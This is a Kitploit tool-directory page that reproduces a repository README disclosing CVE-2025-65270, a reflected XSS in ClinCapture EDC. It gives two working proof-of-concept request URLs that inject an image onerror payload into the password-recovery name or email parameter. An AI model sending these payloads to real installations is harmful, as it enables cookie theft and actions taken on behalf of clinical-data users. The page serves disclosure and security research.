Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-65270 — Reflected XSS in ClinCapture EDC | Kitploit
Tools/GitHubGitHub/xh4vm/cve-2025-65270
Vulnerability AnalysisWeb Application ExploitationWeb SecurityPenetration TestingLearning & Education
GitHubxh4vm/cve-2025-65270

CVE-2025-65270

Reflected XSS in ClinCapture EDC

View Repository
18 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-65270

⚠️ Disclaimer

This repository is for educational and defensive security research only

🔥 Overview

Reflected cross-site scripting (XSS) vulnerability in ClinCapture EDC 3.0 and 2.2.3, allowing an unauthenticated remote attacker to execute JavaScript code in the context of the victim's browser.

poc_xss

🧪 Proof of Concept

To demonstrate the vulnerability, you need to go to the password recovery tab and specify the payload in the name or email parameter or send one request

🔓 Via name parameter

root@kitploit:~
<url>/edc/RequestPassword?action=submit&name=text%22%3E%3Cimg%20src%3dx%20onerror%3dalert(document.cookie)%3E&[email protected]&passwdChallengeQuestion=favorite_animal&passwdChallengeAnswer=&Submit=Submit

poc_xss_1

🔓 Via email parameter

Download Tool
root@kitploit:~
<url>/edc/RequestPassword?action=submit&name=text&[email protected]%22%3E%3Cimg%20src%3dx%20onerror%3dalert(document.cookie)%3E&passwdChallengeQuestion=favorite_animal&passwdChallengeAnswer=&Submit=Submit

poc_xss_2

🚨 Impact

An unauthenticated user can execute JavaScript code in the context of the victim's browser, aimed at performing actions on behalf of the victim or stealing confidential information, such as the answer to a security question

🔗 References

  • CVE-2025-65270